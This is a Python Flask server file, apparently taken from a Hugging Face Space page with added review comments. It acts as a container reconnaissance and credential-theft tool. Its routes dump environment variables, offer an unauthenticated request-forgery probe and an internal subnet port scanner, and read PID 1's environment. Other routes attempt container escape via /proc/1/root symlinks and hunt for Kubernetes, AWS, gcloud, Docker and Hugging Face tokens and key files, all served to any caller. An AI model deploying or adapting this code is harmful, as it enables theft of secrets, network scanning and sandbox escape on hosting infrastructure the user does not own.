Spaces:
Sleeping
Sleeping
File size: 7,180 Bytes
da61b2a c099686 c37bfd9 c099686 da61b2a c37bfd9 c099686 c37bfd9 c099686 da61b2a c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 da61b2a c37bfd9 da61b2a c37bfd9 c099686 c37bfd9 da61b2a |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 |
import os
import subprocess
import json
import urllib.request
import socket
import ssl
import concurrent.futures
from flask import Flask, Response, request
# Flask application object; the @app.route decorators below register their
# handlers on it.
app = Flask(__name__)
# Handler for "/": responds with a JSON document holding this process's
# complete environment and the output of the `id` command.
# NOTE(review): no authentication check is visible on this route, so every
# environment variable (including any tokens or credentials stored there) is
# returned to whoever can reach the server. Confirm this exposure is intended
# and authorized before deploying.
@app.route("/")
def index():
results = {
# Unfiltered copy of os.environ.
"env_vars": dict(os.environ),
# check_output raises CalledProcessError on a non-zero exit status and
# TimeoutExpired after 5 seconds; neither is caught here.
"id": subprocess.check_output(["id"], timeout=5).decode().strip(),
}
# default=str stringifies any value json cannot serialise natively.
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
# Handler for "/probe": attempts a raw TCP connection and then an HTTP GET
# against a host chosen by the caller, and reports both outcomes as JSON.
# Query parameters (all optional): `target` (default "10.108.144.112"),
# `port` (default "7860", converted with int()), `path` (default "/").
# NOTE(review): target, port and path come straight from the request and are
# used without validation, so any caller can make this server open
# connections to arbitrary hosts (server-side request forgery). No
# authentication check is visible on this route.
@app.route("/probe")
def probe():
target = request.args.get("target", "10.108.144.112")
# int() raises ValueError for a non-numeric port; it is not caught here.
port = int(request.args.get("port", "7860"))
path = request.args.get("path", "/")
results = {}
# Step 1: TCP reachability check with a 3 second timeout.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
# connect_ex returns 0 on success and an errno value for connection
# failures instead of raising.
result = s.connect_ex((target, port))
results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})"
# close() is only reached when nothing above raised; on the exception path
# the socket is not closed explicitly.
s.close()
except Exception as e:
results["tcp"] = str(e)
# Step 2: plain-HTTP GET with a 3 second timeout.
try:
resp = urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3)
# The body is decoded with the default codec and truncated to 3000
# characters. The response object is never closed explicitly.
results["http"] = {"status": resp.status, "body": resp.read().decode()[:3000], "headers": dict(resp.headers)}
except Exception as e:
# Any failure (connection errors, HTTP error statuses raised by urlopen,
# decode errors) is reported as its message text.
results["http"] = str(e)
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
# Handler for "/scan": tries a TCP connection to one port on a range of
# addresses built as "<base>.<i>" and returns the addresses that accepted.
# Query parameters (all optional): `base` (default "10.108.73"), `port`
# (default "7860"), `start` (default "1"), `end` (default "20"). The three
# numeric ones go through int(), which raises ValueError on bad input; that
# is not caught here.
# NOTE(review): every parameter is caller-controlled and no authentication
# check is visible, so any caller can use this server to port-scan networks
# reachable from it. Confirm this is intended and authorized.
@app.route("/scan")
def scan():
"""Scan a subnet for open ports"""
base = request.args.get("base", "10.108.73")
port = int(request.args.get("port", "7860"))
start = int(request.args.get("start", "1"))
end = int(request.args.get("end", "20"))
results = {}
# Worker: returns (ip, "open") when connect_ex reports success (0), otherwise
# None. Uses a 1 second connect timeout.
def check_host(ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
result = s.connect_ex((ip, port))
s.close()
if result == 0:
return (ip, "open")
return None
# Bare except: every exception, including SystemExit and KeyboardInterrupt,
# is turned into None. If connect_ex raises, the socket is not closed.
except:
return None
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
futures = {}
# The upper bound is clamped so that at most 50 addresses are submitted per
# request, whatever `end` is.
for i in range(start, min(end + 1, start + 50)):
ip = f"{base}.{i}"
futures[executor.submit(check_host, ip)] = ip
# as_completed raises TimeoutError if not every future finishes within 10
# seconds; that is not caught here.
for future in concurrent.futures.as_completed(futures, timeout=10):
result = future.result()
if result:
results[result[0]] = result[1]
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
# Handler for "/build-arg-test": returns, as JSON, the environment of PID 1
# and the contents (or directory listings) of a fixed set of paths associated
# with image build tooling.
# NOTE(review): no authentication check is visible on this route; the
# response can contain secrets from PID 1's environment and from files such
# as Docker registry credentials. Confirm this exposure is intended.
@app.route("/build-arg-test")
def build_arg_test():
"""Check if any build args leaked into the image"""
results = {}
# Read the environment of PID 1 (this does not inspect Docker history or
# image metadata).
try:
# Check /proc/1/environ for the main process
with open("/proc/1/environ", "rb") as f:
env_bytes = f.read()
# Entries are NUL-separated; empty entries are dropped and undecodable bytes
# are replaced rather than raising.
envs = env_bytes.split(b'\x00')
results["proc_1_environ"] = [e.decode('utf-8', errors='replace') for e in envs if e]
except Exception as e:
results["proc_1_environ"] = str(e)
# Check if there are any leftover files from build
interesting_paths = [
"/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json",
"/tmp/build", "/buildkit", "/.buildkit_qemu_emulator",
"/etc/buildkit", "/root/.cache"
]
results["build_artifacts"] = {}
# Paths that do not exist are omitted from the result entirely.
for p in interesting_paths:
if os.path.exists(p):
if os.path.isdir(p):
# Directory: record its entry names.
try:
results["build_artifacts"][p] = os.listdir(p)
# Bare except: any failure is reported with the same fixed message.
except:
results["build_artifacts"][p] = "exists but unreadable"
else:
# Non-directory: record the first 500 characters, read in text mode with the
# default encoding (so binary content may fail to decode and land in the
# except branch).
try:
with open(p) as f:
results["build_artifacts"][p] = f.read()[:500]
except:
results["build_artifacts"][p] = "exists but unreadable"
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
# Handler for "/overlay-escape": performs four filesystem accesses through
# /proc/1/root, a symlink to it, and /var/lib/containerd/, and returns each
# result (or the exception text) as JSON.
# NOTE(review): no authentication check is visible on this route, and the
# handler writes to /tmp as a side effect. Confirm this testing is intended
# and authorized for the environment it is deployed in.
@app.route("/overlay-escape")
def overlay_escape():
"""Test if we can access the host overlay filesystem"""
results = {}
# The overlay mount shows:
# upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/XXXX/fs
# This path is on the HOST filesystem, but we can only see it via overlay
# Try reading /proc/1/root which should loop back to our own root
try:
# The file object is not closed explicitly.
results["proc_1_root_etc_hostname"] = open("/proc/1/root/etc/hostname").read()
except Exception as e:
results["proc_1_root_etc_hostname"] = str(e)
# Check if we can access /proc/1/root/../ to escape
try:
results["proc_1_root_parent"] = os.listdir("/proc/1/root/../")
except Exception as e:
results["proc_1_root_parent"] = str(e)
# Try symlink tricks
try:
# The link is never removed, so once /tmp/escape_link exists os.symlink
# raises FileExistsError and this entry reports that error instead of a
# listing.
os.symlink("/proc/1/root", "/tmp/escape_link")
results["symlink_escape"] = os.listdir("/tmp/escape_link/")
except Exception as e:
results["symlink_escape"] = str(e)
# Try accessing other containerd snapshots
try:
results["containerd_snapshots"] = os.listdir("/var/lib/containerd/")
except Exception as e:
results["containerd_snapshots"] = str(e)
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
# Handler for "/token-hunt": reads a fixed list of credential file locations
# and looks for files with credential-like name suffixes under several root
# directories, returning the contents found as JSON.
# NOTE(review): no authentication check is visible on this route, so any
# service-account token, cloud credential or key material found is disclosed
# to whoever can reach the server. Confirm this is intended and authorized
# before deploying.
@app.route("/token-hunt")
def token_hunt():
"""Search for any tokens/credentials in the filesystem"""
results = {}
# Check well-known token locations
token_paths = [
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
"/root/.kube/config",
"/root/.docker/config.json",
"/root/.aws/credentials",
"/root/.gcloud/credentials",
"/home/user/.cache/huggingface/token",
"/root/.cache/huggingface/token",
"/root/.huggingface/token",
]
# Per path: a regular file yields its first 500 characters, a directory
# yields its entry names, anything else yields "not found"; an exception
# yields its message text.
for p in token_paths:
try:
if os.path.isfile(p):
with open(p) as f:
results[p] = f.read()[:500]
elif os.path.isdir(p):
results[p] = os.listdir(p)
else:
results[p] = "not found"
except Exception as e:
results[p] = str(e)
# Search for files whose names end in one of the listed suffixes
for root_dir in ["/", "/app", "/home", "/root", "/tmp"]:
try:
for dirpath, dirnames, filenames in os.walk(root_dir, topdown=True):
# Keeps only the first 10 subdirectories for os.walk to descend into; this
# caps breadth, not depth.
dirnames[:] = dirnames[:10]
for f in filenames:
# endswith with a tuple matches any of the suffixes; 'credentials' has no
# leading dot, so any name ending in that word matches.
if f.endswith(('.env', '.token', '.key', '.pem', 'credentials')):
full = os.path.join(dirpath, f)
try:
with open(full) as fh:
results[full] = fh.read()[:200]
# Bare except: files that cannot be opened or decoded are skipped silently.
except:
pass
# NOTE(review): indentation was lost in this copy, so the loop this break
# belongs to cannot be confirmed; presumably it ends the os.walk loop after
# the first directory, which would make the dirnames slice above irrelevant.
break # Only first level
# Bare except: any error while walking a root directory is ignored.
except:
pass
return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')
# Script entry point: starts the server via app.run when the file is executed
# directly.
# NOTE(review): host "0.0.0.0" listens on all network interfaces, so every
# route above is reachable by any client that can connect to port 7860.
if __name__ == "__main__":
app.run(host="0.0.0.0", port=7860)
|